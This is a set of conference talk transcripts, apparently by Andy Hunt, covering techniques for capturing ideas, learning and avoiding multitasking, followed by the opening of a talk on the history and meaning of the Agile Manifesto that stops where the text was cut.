know what? I was wrong about that. He was starting to get really interesting content coming out. He was getting marketing plans, new ideas, fresh things just started kind of spilling out as it were. So it took him a week to do it. Some people have reported they get this right away. Again, your mileage may vary. There's a lot of other ways to kind of get around this problem. This is Thomas Edison who invented the light bulb in 1879. Prolific inventor came up with a lot of stuff, tried a lot of ways to get to electricity and light bulb and various other inventions. And he had a peculiar habit, a peculiar technique for seizing on ideas that his pre-conscious was trying to deliver to him. He would take a nap in the middle of the day with a cup in his hand filled with ball bearings, little round spheres of metal, BBs in his hand. And the idea is he'd fall asleep and as he'd fall asleep he would drop the cup of BBs onto the floor and it would clatter and make this horrific noise. And I'm sure his housekeeper really appreciated this as well. So he'd be just drifting off, bang, bang, bang, bang, bang, all the BBs would land. He'd wake up and immediately go and jot down the first thing that was on his mind. Interesting. Worked for him. So there's other ways at approaching problem solving. That's why we want to sort of harvesting things that might be brewing in your stew. The other thing to kind of look at is jiggling thoughts loose if they're stuck. And there's a great book called A Whack on the Side of the Head by one Roger Van Oesch. And at first I thought this was a book on how to do customer service. But no, this is a way of looking at problems differently. He has suggestions like looking at a problem and trying to look at it in reverse. So instead of trying to fix a bug by making it not happen, think of the ten ways you can deliberately make it happen. And that might shed some insight on the process. Exaggerate it. The bug just does this, well what if it did all of this? What can you learn from that? Combine ideas, rearrange them, ask why, all these sorts of things to kind of jiggle loose what you're thinking about. And he talks probably more importantly about these kind of mental blocks or locks that prevent you from seeing the solution. Things such as believing there's only one right answer, which is rarely true after sort of primary school arithmetic. It's very rare you get just one right answer. Thinking that something's not logical. Eighty percent of your brain's processing power is not logical. If you're married or have a significant other, did you go through a logical process to select them? Did you go through a checklist and an Excel spreadsheet? And if you did, I'd like to talk to you afterwards because that's kind of funky. No, of course not. We are not logical beings. We don't work that way. And so on and so on. So he's got these various mental locks to look at. And some of the examples were just sort of interesting when you look at other ways of looking at things. For instance, he gives this little test. This was from the book where he says, if I take away six letters from this figure, what common English word is left over? No fair any other words. What common English word is left over if I remove six letters? And I guarantee to you, you are looking at this, you're thinking about this the wrong way. He was being very literal. You remove six letters. And I see we're not used to thinking it that way. As soon as you say, ooh, it's a puzzle, you bring all this kind of baggage to the table thinking, oh, it's random, it's any six letters, it's blah, blah, blah, all this kind of stuff. And he's got other examples, this great sort of six-year-old joke, you know, what do John the Baptist and Winnie the Pooh have in common? A middle name. If you're six, it's funny. The point is, we're not used to thinking in this context, we're not used to thinking that concretely. You know, we're looking at, okay, what's the symbolism behind it, what's the this, what's the that? We're bringing all this other stuff to the table when, in fact, it's just a very concrete, very simple, stupid joke or concept. We're just kind of looking at it the wrong way. So this brings us to the magic of, in classical literature, the idea of an oracle, lower case O, not the big scary oracle, the lower case O. So what would happen is, you know, you would go to the magic oracle and it would give you some impenetrable statement and you'd have to go back and ponder it. And it's interesting how this works. I mentioned before the R mode in your brain is kind of responsible for pattern matching and searching your memory. So what happens is, when you're faced with something like one of those images that you see from rubbing your eyes or you're faced with some, you know, Chinese fortune cookie statement or something from an oracle that doesn't really make sense on the face of it, what your brain has to do is kind of take that and widen out its search parameters. It's like, okay, I don't know what in the hell you're talking about. So we're just going to start combing through everything, anything that might possibly be a match. So something like a Zen Cohen works this way, right? You say, what is the, you know, one hand claps, what sound does it make? Or commonly translated as what is the sound of one hand clapping? You feed that into your right mode search engine and it's like, what? That's stupid. That makes no sense. What are you talking about? All right, well, we just broaden out the search parameter and start looking through everything. So it's kind of a way of broadening what your subconscious processes are examining and trying to come up with. And the mathematician, Henry Poincare, I'm sure I massacred that, my Norwegian's worse, he used to do this. He would be working on a math proof and get to a kind of certain point on it and get stuck and not know how to solve it. So he would sort of put it all down and he'd go for a walk, just a walk out into his garden somewhere around and halfway through the path, he'd be like, oh, I didn't try whatever. I didn't think of that. He'd run back, jot it down. Oh, yeah, that works. Look, you just get to the next step stuck again. Out you go. Now the key when doing that, you don't go out there on the walk and go, God, I got to solve this guy. What is X? Why can't I find X that's right there? Why can't I do this? You know, bubba bubba. That's not the way to do it. The way he described it was, you want to hold the question lightly in your mind. So you don't start thinking about a television show or what kind of beer I want for dinner tonight or this sort of thing. But you just kind of hold it lightly back there. Yeah, think about that. But mostly you're concentrating on the walking. And what this does, it kind of gives that overzealous chatty L mode, which tends to block out the R mode processes. It gives it something to do. It's thinking about walking. Left, right. Is this platform going to fall if I get to the edge? You know, it kind of gives it something to do. And that frees up the R mode to kick stuff over the fence. So you've probably experienced this yourself. If you've been coding or working on a design problem or some kind of bug and you're just really stuck and you can't figure it out, you can't figure it out, you give up in desperation and you slam the computer, you storm out, you walk in down the hall, you're walking out to go home. And what happens when you're like halfway out somewhere? I didn't set X to zero or whatever it was. The idea pops into your head. Well, that's this kind of phenomenon. As it turns out, the worst place to be if you want to be inventive or creative, the worst place you can be is in front of the keyboard. Why is that? Well, what happens is you're sitting there typing and working on letters and curly braces and symbols and this sort of stuff. Your brain gets locked into favoring L mode style processes and it shuts out the R mode completely. It's just locked in this. This goes back to the pair programming example. The driver who's sitting there typing gets locked into this kind of symbolic manipulation mode and all these other processes don't get a chance to actually fire or work. Whereas the navigators sitting there, they're not typing, they're looking around, they are more free to let these other processes come into play. So as a consequence of this, first of all, when you are stuck on a problem, step away from the keyboard. That's the best thing you can do. Secondly, this presents us with a bit of a problem. Because these pre-conscious processes are sort of asynchronous and not under our direct control and because they're more likely to fire when we're not at the computer, what that means is that we're going to be somewhere else when the great idea comes to us. You're going to be mowing the lawn, doing the dishes on the hammock, in the pub, at the restaurant, on the bus, the train, the car, whatever. You're going to be somewhere else when this pops into your head. And we need to do something about that. So what happens is everyone has these kinds of great ideas, but they come to you at random times. So few people actually bother to keep track of good ideas when it comes to them. Even fewer then act on it, and then very few, given all that, actually have the means to sort of pull it off. So to get up this ladder, at first, at least, you've got to keep track of great ideas. Now, it turns out that the way your brain works, if you start keeping track of great ideas, your brain will acclimatize to that. It's a self-organizing machine, right? So if you start doing that, it's like, oh, you want this kind of stuff. I'll be on the lookout for that. I'll start finding more and more of that. Consequently, if you don't keep track of good ideas, then your brain's like, I'm giving up. I'm going to go into the back and watch old reruns of Lost or something. It's like, you know, eh, don't need to bother with it. So it ends up that to get great ideas, you've got to start keeping track of them, and then you'll get more of them. So what you need is what we lovingly call an exocortex. Some place to keep ideas outside of your brain, because your brain's pretty bad at keeping track of this sort of stuff. This is really the number one idea that can get you ahead with something. It's just simply writing down an idea when you have it, whenever you have it. So that means you have to have something that's with you all the time. I carry around a little Moleskini notebook, one of the small ones, and a Fisher space pen. This is the kind that will write upside down in a boiling toilet should the need arise. Not that I've tested that. That's the marketing claim. But you know, it's small and it's with you all the time. I know folks who carry index cards in their back pocket, you can use your iPhone or something, being aware of the dangers of sort of, you know, having to type to get a note in. One fun thing you can do, especially if you're driving or your hands aren't free, is use your cellular, your mobile, and leave yourself a voicemail with whatever your idea, your insight, your notion might be. And if you've got a system like some of them out there where it'll take and transcribe your voicemail into email, you call yourself, leave yourself a message, get to your office, get to your computer. Here's your great thought transcribed for you in your inbox. You can copy and paste it and stick it somewhere and then work with it later. So there's a lot of ways to kind of get around this. Some of them are a little fancier than others. This is kind of a cool idea. This has been around for years, a website called pocketmod.com where you can pick out the style to make like this little foldable booklet out of a single page of A4 or 8.5 by 11 paper. And you can tell it if you want lines or grids or tables or what have you. And with a couple cuts, it folds up and makes this great little booklet. You can stick in your pocket. That in the stub of a pencil and you're good to go. Cheap as dirt, but it's with you all the time. It's disposable. For stuff online, if you're, you stumble across stuff and you want to save it, something like Evernote.com, it's probably a good place to stick resources so you don't lose them. And that's what happens is we have this tendency to say, oh yeah, I'll remember that. You wake up in the middle of the night with a great idea. Oh, I'll remember that in the morning. Not going to happen. It does not happen. It doesn't work that way. You've got to jot it down. I'll find that website again. I never do. They're effervescent. Jam it in here. Do something with it to keep it. So that's one way of looking at thinking and learning of trying to harvest stuff that our brains are trying to tell us. That's kind of working on the output side of it, if you will. So now I want to talk a little bit about the input side of the equation. What can we do to make learning a little bit more efficient, more effective? Hopefully none of this is anything shockingly new to you. Hopefully this is all stuff you've maybe stumbled across once before, but is just a good reminder. If it is shockingly new, write it down. So the first thing to be aware of is, as a learner, you're trying to learn a new library framework language. I hear Elixir is really cool. You're trying to learn something new. There's different ways of learning, different learning modalities. Classically, they start off saying there was three types of learners, visual, auditory, or kinesthetic. This guy named Gardner came up with seven different intelligences, seven different ways. They ended up adding more even onto that later. It doesn't particularly matter. Obviously, if you like coming to lectures like this and you learn best from this kind of thing, you're probably more an auditory learner. You like hearing it. If you need to read it, you need to see it. That's more visual. If none of that works for you, you just want kind of experience with it. You want to play with it. You want to try it out. That leans more toward the idea of kinesthetic or experiential learning. They're all valid. Nobody is just one of these. You can learn by any of these methods, but for you in particular, one or more of these might be more efficient than the others. If you haven't figured that out yet, that's kind of worth a try. Let me go to a couple conferences, read a couple books, try some stuff out when it's brand new without reading about it or hearing about it and see what works best. Then you can focus on that thing. Okay, well, I know I need to hear it, so let me get the book on tape. Let me listen to the podcast, whatever, and concentrate on that as opposed to perhaps trying to read it. Having said that, sometimes that can just be a luxury because 90% of the stuff that we need to absorb is only going to come to us in written form. It's going to be an article, a book, something on the web, and you have to read it anyway. That's interesting. How do you read? Does it matter? Do you just like start scanning it with your eyeballs and it just fills in or are there better ways to approach reading perhaps? Turns out there are. There's a variety of kind of reading summary techniques for lack of a better word. They'd all sort of boil down to this same kind of workflow here. This popular one's called SQ3R because the steps in English at least comprise an S, a Q, and three R's. The idea is the first thing you do is survey the whole work. It doesn't matter whether it's a paper book or an e-book or an article on the web. You just kind of scan the whole thing. Look at the table of contents if it has it, chapter summaries, section summaries. Kind of get your head around the whole thing without delving in too deeply yet just to kind of get a sense of the scope, where it's going, what you want out of it. Then note any questions you have. Is this going to teach me about exception handling? Will I actually understand what a monad is after this? Will I understand how to curry something? Whatever it is. Note the questions down. Don't do anything else with them yet. Just kind of write it down. Then go through and read the piece in its entirety front to back. When you're done with that, then try to start to recall. Try to remember stuff. Try to do it. This gets really kind of interesting. You can read, for instance, a book on a programming language and say, oh, yeah, yeah, yeah, I get it. You do this, you do that. It uses brackets for this and curly braces for that. I understand it. Okay. Now go try and type hello world or something from scratch. Oh, yeah. Now wait. How did that go again? Trying to recall and actually use it turns out to be more powerful than rereading it and reading it again. In the old days, they used to say that cramming for a test should all be about rereading the material. Turns out it doesn't work that way. It's much more efficient to test your recall of the material. That's what strengthens all the neural connections is trying to retrieve the information. So something you really want to memorize, you want to emphasize the recall of it. And of course you don't know it. Go back. Okay, it's that. Now I'll need to test myself on that again later at some point. But concentrating on the recall is what really cements it into your memory. And then you expand on that. You review what you read. Look at your notes. Look at the questions. You had noted down. Did it answer that? Yes, no, maybe. Oh, it talked about that. But now I don't remember. Let me go back and look at that and so on. And what this does is this gets you this kind of flow from one set of processes to another. And that's really the secret. Back in the 1960s and the 70s when they first discovered this kind of right brain, left brain dichotomy at the time, you know, there was tons of books about, you know, right brain cooking and right brain tennis and right brain this and yada yada. And it's stupid. Your brain doesn't actually work that way. What you need is to have both sets of processes cooperating. And in this case, this is actually a good example of doing something that starts off in a very broad, holistic fashion, surveying the whole work, thinking of general questions over the whole thing, and then narrowing down to very traditional linear L-mode sorts of, you know, make yourself a test and recall it and so on and so forth. And this kind of combination of activities seems to be much more effective than any one set on their own. So that's the kind of thing we try to head for. So in a similar vein, how do you take notes? You're studying a new language, a new technology, new framework. How do you take notes as you go along? Do you take notes as you go along? I find this kind of interesting. I mean, in the old days, if you were like, you know, studying for university or something or a test, of course you would take notes in the class and do that sort of thing. But now you want to learn a new programming language. You want to learn Ruby. You want to learn JavaScript the right way. The good parts of JavaScript, that won't take long. You know, Elixir, Erlang, whatever. Do you take notes as you go? Or do you just kind of read some stuff and mess around with it and try a few tutorials and oh, now what was that again? Now, you want to take notes about it. And if you're trying to invent something, all right, you try to come up with a new design, you know, some solution for the project you're working on, some exploratory thinking. Great way to take notes. Best way to do that kind of note taking, where you're learning something or where you're exploring a topic is with a mind map. And this is funny. Let me just confirm a bias here. How many people in the audience right now are from the U.S.? Raise your hand. Good. Okay. One relative, that's fine. So everyone else is from Europe. Okay. Raise your hand if you were exposed to mind maps anywhere in your educational process. Grade school, primary school. Okay, less than usually, that's like 100%. And it's funny because if I ask that question in the U.S. and say, you know, have you ever heard of a mind map before? Crickets. Nobody raises their hand. They've never even heard of such a thing. And it's usually closer to 100% almost anywhere in Europe. It's like, oh, yeah, we've had that. You know, we use that in school, so on and so forth. So I'll assume this is at least a little familiar to you. I just want to go over a couple things. Does this look particularly tidy or neat? No. This is a working document. This is something you scribble on when that asynchronous insight comes to you. Oh, look, this is related to that. Boom. You put a big swoop on it. It's very much a working document. This was part of the thinking and learning book that I wrote. And, you know, you eat lunch. You leave this out on your desk. You eat lunch over it. I think that was mayonnaise. That was red wine. Not sure what that one was. You know, it's messy. It's organic. And that's the kind of tool you want for this kind of exploratory thinking. So you start with a mind map. You jot some stuff down. And then you want to look at it and kind of work the mind map. You want to ask yourself, okay, I've gotten this so far. What else do I see? Are these things related at all? Is there something missing here? I've got this in and that in. Is there anything in here I should know about? What else do you know that you could possibly add to this? Well, I read this other thing the other day, but I don't see how it fits in. Okay. Draw it over here to the side. You'll work it out later. What else, you know, could there be? It's like, wouldn't it be really awesome if you could do this to that? And if this thing were related to that and you could tie this in, you know, what else do you imagine could be? And predominantly, you have all these kind of thoughts floating out here. You're scribbling down. How are they related? Because just like in an object-oriented system, the objects aren't interesting. It's the relationship between them, the behaviors between them. That's what's interesting. And it's the same here. How do these things that I'm studying relate to each other? How do they tie in? That's where you start to get some real learning. So this is very messy, very organic, very loose. You can, of course, get mind map software for your computer. Is it as useful? No. Not particularly. You're getting back into that sort of L-mode symbolic lock. This is a great way to keep track of research, perhaps. I did this for the book. It's like, you know, you can click on things. It'll take you to the original PDF file from some doctor somewhere or some web page, but it's not a tool for exploratory thinking. But once you've finished that kind of exploratory phase and you need to kind of, you know, maybe productize that information and work on it a little bit more, you want to look at a different style of wiki. You want something now closer to the computer, something like, you know, a wiki like a Wikipedia uses or even better than that, just something like an editor in a wiki mode. You can do this with TextMate, with Sublime, VI, Emacs. You can probably do it in Eclipse for all I know. It's just an editor mode that will highlight camel case words and let you make new nodes very quickly. So as we said before, if you keep track of good ideas, you'll get more of them. And similarly, once you make a category for some kind of a new idea, your brain's going to start looking for that specifically. It's like you put a filter in place. And this is similar to an idea called sense tuning. But once you start looking for something in particular, once you've got a place for it, your brain's like, oh, look, I see this over here. I see this over there. I see that here. And it gives you a place to put it. Along the same vein, if you're trying to do this, expand this into more of a team environment, you can do something like this technique called affinity grouping. And the way this works is you get your team, you get your bunch of folks together, you get them little post sticky notes and markers, and they all jot down ideas, thoughts, whatever the topic at hand is, and you stick them up on a whiteboard. Stick everyone's thoughts up there, and then you go through as a group and you try and you rearrange them. You coalesce them. Okay, these ideas are all talking about this. These talk about that. And as it starts to coalesce, as it starts to coalesce, you can draw circles around them and arrows and start connecting them. And basically, you've done a group mind map. So it's an interesting way to kind of get multiple people involved on it. The overall thought here is that for these kinds of very loose, slippery thoughts, you need very loose tools. You don't want the tool to interfere with the thinking process. So if you try to do something like this and then stick it into an outline in Word or something, it's going to kill you. Because as soon as you start typing and screwing around and then Clippy comes up and tells you something, your idea is out the window. And in fact, I had an interesting conversation just a couple of weeks ago with a fellow who makes hand-ground nibs for fountain pens, old-fashioned fountain pens. And he was describing how you make a music nib for composers. And it's got special three times and you file it differently and all this kind of stuff. And he says that they sell these to all the big composers in Hollywood and such that they refuse to use anything else when they're composing, especially at the piano. Because you want to be able to grab something and very quickly jot it down. And if you have to go type it into a music program like Finale or Sibelius or something like that, that extra effort of trying to feed it to the computer wrecks the thought. You start to lose it again, just like that dream you wake up from and you're trying to describe it. It's such an effervescent thought, you just want to get it down quickly before you lose it. So they use these special fountain pens that make a quick blob and a little strike and all this kind of deal. That's sort of interesting. So now some warnings and some advice on how the brain works. One thing we are not built to do, but we think we are, is multitask. We suck at multitasking. We are not good at it. If you think of the brain as a CPU, there is no sort of save stack, restore stack operation. If you're working on something and you get interrupted, you've got to pull all that information back one by one and build up where you were again. That's very expensive. And people think that you really can multitask and sometimes we'll take that to ludicrous extremes. You know, I can watch TV and I can text and I can write code and I can read a book all at the same time or worse. It doesn't really work that way. So a study, and I'll put that in air quotes, in the UK a couple years ago suggested that if you constantly check your email while you're working on something, then your IQ will drop about 10 points. But at the same time, if you were to smoke a joint, a marijuana cigarette, your IQ would only drop about four points. Whatever you do, don't do both. That would be bad. Another study suggested that some 40%, 20 to 40% of your work day can get lost just by multitasking. That right out of the gate takes your eight hour day, if you remember what those were, down to a five hour day lost just from context switching trying to multitask. So what do we do about this? Rule number one, send less email and you will receive less email. Make the phone call, walk down the hallway, look it up on the web. Every email you send is just going to come bouncing back at you and maybe more so. Send less, you get less. Choose your own tempo for an email conversation. If somebody emails you and you bounce right back on it and get right back to them, guess what? You've set the tempo for that conversation now. Every time that person emails you, they're going to expect an instant response. I like to let emails age, like cheese or wine. It's like, oh, this was from Tuesday. That was a great vintage. We'll just let that age a little bit and send it back when I'm damn good and ready to. Either way, and sometimes you can't. If the server is on fire, you've got to deal with it. But it's your choice. You can choose when to reply and you can set the tempo and the pace for that conversation. If it needs to be fast paced, great. If it doesn't, don't do it. Don't context switch. That's the danger of multitasking. You're working on one thing and, oh, I've got to switch context and work on something else. Bang, you're dead. That's what you have to avoid. Getting things done, the David Allen cult slash method, the way you do it, he's got these set rules. Any kind of input queue that you have to work, call it email, but it could be a paper job list or whatever else it is. You scan the queue once and only once. From that, you do one of three things. You either answer it immediately, no. You assign it to somebody else, Fred, take care of this, or you sort it into a pile. All right, these are bugs I have to fix. These are things I have to pick up on the way home. These are meetings I have to set up, whatever it is. You sort it into piles. Then you go through and work each pile top to bottom. These are the bugs I'm working on now. I'm not rechecking the queue. I'm not checking email again. I'm working the queue in order. The other thing is not to ever keep mental lists. If you keep mental to-do lists, that's kind of like, your memory in that case is sort of like dynamic RAM. It has to keep being refreshed. So you kind of have to keep all these CPU cycles burning to keep this list going in your head. I don't have that kind of bandwidth anymore. Write it down. Get it out. Put it in your Excel Cortex. Write it in a sticky note, something. Get it out of your head so you don't have that dynamic refresh going on. Set queues for task resumption. This is very clever. You're sitting there. You're in the flow. You're typing away and your boss, somebody comes in to interrupt you. You see them standing there. You've got about a second and a half. So you finish typing what it is you want to do when you come back. Finish adding the exception handler. Add this to the database. Whatever it is. It doesn't have to be English, but something you can recognize when you come back. A little note to yourself. Right there in the code. Just blah, blah, blah. Here's what I need to do. Bang. Yes, what is it? Okay. We have to do this. Da, da, da, da, we do this. We come back. What the hell was I working on? Oh, yeah, it was this file. That's right. Oh, I got to add the thingy. Okay. Bang. You have facilitated that task resumption by leaving yourself a queue. Researchers have claimed great results at this of it being effective. On a larger scale, set the interruption protocols for the team. When is it okay for your team members to interrupt you? When is it not? Do you put a little figure up on your desk saying, I can't be interrupted right now? I've got the Darth Vader up? Do you set hours during the day? You know, we will not as a team. We will not do email on Tuesdays and Thursdays. Or we will only do email from one to four or whatever it is. I don't care. Pick something. But set that so everyone knows the rules and you have your uninterrupted time. But the biggest thing you can do if you haven't done it already, if you want a productivity gain of 20 to 30% without learning anything, get a second monitor. Why is that? What do you call Alt Tab on Windows? Contact switch. What do we say about contact switching? Yeah, that's bad. Your brain's not good at it. That's horrible. You need the extra real estate so you can have everything all at once. I have spaces on the Mac. There's equivalence for Windows. I set different sets of screens so that I have, it's all task based. So all my communications is in one coding in another. You know, some other business functions in the others. I actually run dual screens, dual headed, so I can have sets of these things going on. It looks something like that. You can get, the Windows one is called Finestra Virtual Desktop. Same kind of idea. But the idea is if you're working on one thing, that's all you want to be bothered with. You don't want the other stuff interrupting you. So, to sum up, this all sounds great. Oh, I'm going to start mind mapping. I'm going to go tell my team to piss off on Tuesdays. I'm going to do this. I'm going to do that. Yeah, yeah, that's great. It's going to be harder than that. So have a plan, what you want to do. Don't worry about doing something wrong. Worry about not doing something. And realize that habits take time to form. Realize that what you believe about your brain will make it sell because it's going to rewire itself that way and take small steps. That's all I have for you today. This is my email address, my Twitter handle, my blog where I rant on these things. Most of this material can be found in the Pragmatic Thinking and Learning book. Here's the other six that I wrote. Thank you so much for having me here today. Now, before you go, I am bade to remind you to evaluate this session with a green card in the bucket. There's some other colors too, but you want to put the green card in the bucket. If you want to, you can add feedback or comments can be written on the cards. They're a little small, so you can have to write tiny. Great's a good comment. Do that, throw it in the bucket. I've got two other talks today. Not the next session, but the session after that. I'll be talking about bugs in processing, bugs in your mind, which is kind of interesting. And then later on this afternoon, I've got to talk on what the last 10 years of Agile haven't and have done for us. Hope you all have a great conference. Thanks.
|
Software development happens in your head; not in an editor, IDE, or design tool. But how can you mine the best ideas your mind comes up with? Join Andy Hunt to find out how to grow your brain, take advantage of different processing styles such as synthesis vs. analysis, sequential processing and pattern-matching, and learn new techniques for generating great ideas and harvesting internal clues. Finally, you'll discover one simple habit that separates the geniuses from the "wanna-bes."
|
10.5446/51541 (DOI)
|
Dynamite. Okay, fun. It always reminds me of that old phone commercial where the guy walks around and goes, can you hear me now? Except now it's, yes, I can hear you now, and I've got a copy. But... Alrighty, so, I would like to talk for a while about agility and the agile manifesto, which I was fortunate enough to be involved with some 12 years ago, this last February. Before I get into that, I want to set the groundwork a little bit and mention something I had mentioned in one of my earlier talks today about the importance of context. If I ask you to think of a tree, or to draw a tree, this is likely what you would think of, just an isolated object kind of sitting there by itself. But in reality, there's a lot more going on. A tree is really a system of things. In fact, it's several systems of things. You've got this whole system of respiration and the leaves and CO2 and all this kind of stuff. You've got the whole system with the roots and the soil and the Krebs cycle and nitrogen and all these things that I don't remember from biology, but they're there. So one thing we always try to do when we're looking at code or teams or projects or anything really, is to learn to think of it in context, in terms of it being an active moving system, not just some thing sitting there. It's an actual system. And the reason you want to do this, if you take something out of context to look at it or study it or work on it, you lose a lot of nuance. You lose a lot of information. It's a lossy kind of a transformation. For instance, if you were in a, I don't know, a doctor's office maybe or a bank and they had a sign saying free candy, well that would mean one thing. But if you saw it on the side of what we affectionately call a kidnapper van, that kind of takes on a little different meaning out of context. Similarly, talking about tools, an axe is a very fine tool. We had a neighbor just the other day take a tree down with one, nothing wrong with it. But if you're going to go hitchhiking, probably not something you want to carry with you. That sends the wrong message. And then there's some things that just by virtue of the model, you kind of lose the sense of what you're talking about. So I'm sure all of you probably in school at some point had to build a model of the solar system. Whether it was with oranges and grapes or clay or something, you build the model of the solar system and all the planets go around each other and that's great. Except that's not really what it looks like. And there's this great animation online that suggests that it's much more of a vortex model. Because the planets are going around the sun and the sun is whipping around, like Bob said in his talk the other day, what you really have is this vortex model. And the whole thing is shuttling through space. And it's interesting to me because that gives really a different flavor to the solar system. It's not like you're stuck on this planet and you're just going around in circles and each year you come back to the same old spot again. No, we're going places. I don't know where, but we're going places. So great sense of movement there. But just by looking at that model in a slightly different way, it really gives you a different sense. So again, the context is kind of interesting. So back in February of 2001, some 17 of us who were interested in software development happened to get together in Snowbird, Utah. Somehow Alistair Coburn picked the place because he lives there and he likes to ski. Why we didn't go to, like, the Caribbean, I don't know. That was a failure, an early failure on our part, I think. So we got together and we talked about software and developing these sorts of things and it ended up being a fairly momentous occasion in software development. Unfortunately, in September of 2001, there was another sort of momentous occasion that captured headlines the world over. So 10 years, about 10, 11 years after that, when they finally caught up to Osama bin Laden and took him out, the trending tweet on Twitter at the time from teenagers was, who is Osama bin Laden? Wow, 10 years. Just 10 years and you've got kids tweeting, who is Osama bin Laden? Why is it important we killed him? Is he in a band? And get off my lawn. 10 years. And you forget. You know, monumental, pivotal things like this. So it is understandable that in the end of leaving 10 years that we might have forgotten some of the things about agility or some of the things we were talking about at the time. So that's what I want to kind of broach on today, kind of talk about. If you go to agilemanifesto.org, there's this marvelous picture in the background faded up. That right there is indeed the back of my head. See the resemblance. So I was digging through this as the 10th anniversary came up and I noticed something that I think, you know, first thing that tends to get forgotten. What's the very first line of the preamble here? We are uncovering better ways. We don't know the better ways. This is not the ultimate list of the best way. We're figuring this out. We're still figuring this out. We've been figuring these things out since 1945, 1947. We're still working on it. It is not the end of the road by any means. So what is agility? Well, first I just want to pull up this Charles Darwin quote because I think he's really close to the heart of it here. He points out that it's not strength that guarantees survival. It's not intelligence that guarantees survival. Those are both helpful. Love them both to death. Wonderful things. But that's not going to make the difference. It's adaptability. That's what guarantees your survival. And really that's what agile is all about. Kent Beck's first book on XP. What was the subtitle? Embrace change. Right? Embrace change. Not tolerate change and grit your teeth. Because that's how we usually do it. But embrace change. And embrace uncertainty armed with working software. Stuff that actually runs and does its thing. So back in February 12th, sorry the date's backwards, back on February 12th, 2001, we got together and we didn't even know what to call the stuff we were working on, the stuff we were thinking about. So we booked it as the lightweight methods conference. Lightweight wasn't a particularly, that term didn't last long because it sounded like you were in a lightweight class and the heavyweight was going to come and clean your clock any second now. So that was not a great idea. But we bandied about some other names. Agile, resilient. Nowadays maybe anti-fragile. That's probably actually really close to it if you read the book about that. Dynamic, interactive as opposed to static and batch. Interesting way of thinking about it. That's a little closer. I think almost any of those probably would have been better than agile. But you know, that's the way it goes. I think agile somehow gave people the wrong idea. So I like to think of it more as adaptable or interactive or dynamic, something like that. Anyway, other than picking a name, a lot of what we were talking about wasn't particularly new. Even stuff that was very contentious at the time like Kent Beck's extreme programming, pair programming technique, right? That dates back at least to these fellows. They're pair programming. It wasn't all that new. So we got together for the anniversary year or two ago and I'm looking through my notes and I realized back at the original meeting we didn't discuss practices. We didn't discuss refactoring or pair programming or unit testing or any of these sorts of things. And maybe we should have at the time even version control wasn't really universally adopted. I could go to halls like this and say, you know, raise your hand if at work you do not have version control. You've got one big shared disk. Everyone writes to it and the last one in wins. And about a third of the audience would embarrassedly raise their hand and admit to it. No one admits to that now. Because they're using something, they're using source unsafe or subversion or get something or other. But this wasn't even a topic of discussion. It was like, yeah, yeah, yeah, you got some practices, fine. That's not what we were interested in. What was more interesting was what was this thing that we were trying to talk about? What did we mean by agile? So let me turn that around and ask you a question. If my clicker works, there we go. Raise your hand if you are doing agile. You're doing it wrong. It's not something you do. It's something you are. You can be agile. You do practices. But agile is something you want to be. It's not something you do. And that's a very critical point. I'll talk more about that as we go along. All right, let's try two for two. Are you comfortable with the way you and your team, your organization are doing agile? Does it feel, you know, is it finally, if you've been doing it, is it kind of feel natural now? Does it feel comfortable? Yeah, no one dares raise their hand now. Yeah, now again, if it's comfortable, you're doing it wrong. It should have that feeling like what comedian Stephen Wright used to say, that feeling when you're tipping back in the chair and you're just about to go over. I really shouldn't do that up here. That's kind of what it feels like, that sort of tipping back thing. That's embracing uncertainty. So what is this agile thing all about? Well, we envisioned it at the time, and notice we didn't even make a real definition of it or anything, but we thought it was something that should be ever-changing, ever-shifting, ever-responding to change. It shouldn't be a thing under a glass slide in a box. It's changing all the time. So one of the quotes you'll see often is ready, fire, aim instead of the usual way around. And Tom Peters popularized that, and he's got this quote on his website where he's quoting from this fellow talking about delivering Western aid into Africa. And interesting, taking the point, the distinction between searchers and planners. And this I think is a very, very good point. He says here, searchers find things that work and build on them. Okay, that sounds like us. Searchers adapt to local conditions. Planners don't. Searchers find out if the customer is satisfied. A planner thinks he knows the answers already. A searcher admits he doesn't know the answers in advance, but will find them by trial and error experimentation. Yeah, baby. That is much more like it. We want to be searchers, not planners. As soon as something on an agile project sounds like you've got a plan coming up, be concerned. That might not be the right way to go about it. In a similar vein, when I was doing the Pragmatic Thinking and Learning book, I came across this marvelous book by Dr. Patricia Benner from Novice to Expert. And this describes, among other things, the dryfus model of skill acquisition and how you grow from Novice to Expert in a particular skill. And one of the things she notes, talking about formal practices and documenting best practices and this sort of thing, she notes that practices can never be completely objectified or formalized because they must be worked out anew in particular relationships and in real time. In other words, in context. Just like I started off talking about the tree and the crazy guy with the ax and whatnot. You take something out of context, it doesn't mean the same thing. When someone says, oh, this is a best practice, I laugh at them. Ha, ha, right in their face, right? Best practice for who? Under what circumstances? By whom? For whom? Who does it benefit? I mean, you know, there's a thousand questions that go with that. There's no such thing as a best practice. That's that somebody's trying to sell you something when they do that. That does not work. So, all right, well, this is kind of close. None of this really sort of defines agility, though. These are some nice quotes and some nice ideas. So, back when I was writing the book Practices of an Agile Developer with Venkat, Supermoneyim, who's here at the conference this week. Great speaker. Hope you had a chance to hear him. We were writing this book on Agile Practices and we needed, there was a blank spot, there was a place on the page, we needed a definition. So, I came up with this. Agile Development uses feedback to make constant adjustments in a highly collaborative environment. That's pretty close to what it is. That's what you want to do. You want some place where you're getting feedback all the time from everything, from every action, making adjustments based on it, and collaborating with everybody involved. All right, that's pretty straightforward. Why that definition? Well, one of the things, going back to context, one of the things we were trying to prevent was any variation of this scenario where you have a big plan and a mighty heroic act, some lengthy wait to see if it worked or not and get the feedback, sliding inexorably into the inevitable panic, finger pointing, blaming, bankruptcy, you know, all those things at the end of the line there. That's what we do not want to see on a big scale, certainly, but even on the small scale. You know, we're planning for a big meeting next week. Everyone's going to be there. It's going to be this big thing and, you know, for whatever reason, we're going to wait a while later and do this and that. But, didn't know, big anything, bad idea, something's wrong there. So, instead of this, what we want to see is something like this. Do something. Gather feedback from it in real time and in the real world. Not just Fred said it was okay. My boss liked it, but you get real feedback under actual conditions in real time if you can. Correct what you need to correct. Rinse, lather, repeat. Do it again and again. Notice this starts with do. This doesn't start with plan or theorize or think about it. You got to have something to work with before you can get feedback. So, you do first and then work with it. One of the analogies we used to use talks about firepower. In the old days, you could have something like a big, I don't know what you call it, a howitzer or a cannon or whatever. These giant guns were very much what we would call plan based. You have to like measure the distance to target, compensate for the wind and the azimuth and the range and the whatnot. You plug all this into a firing computer or firing tables in the old days and you crank the thing, crank the thing, load it, fire it. And if the thing you're shooting at is any more mobile than a city, it's gone. It's out 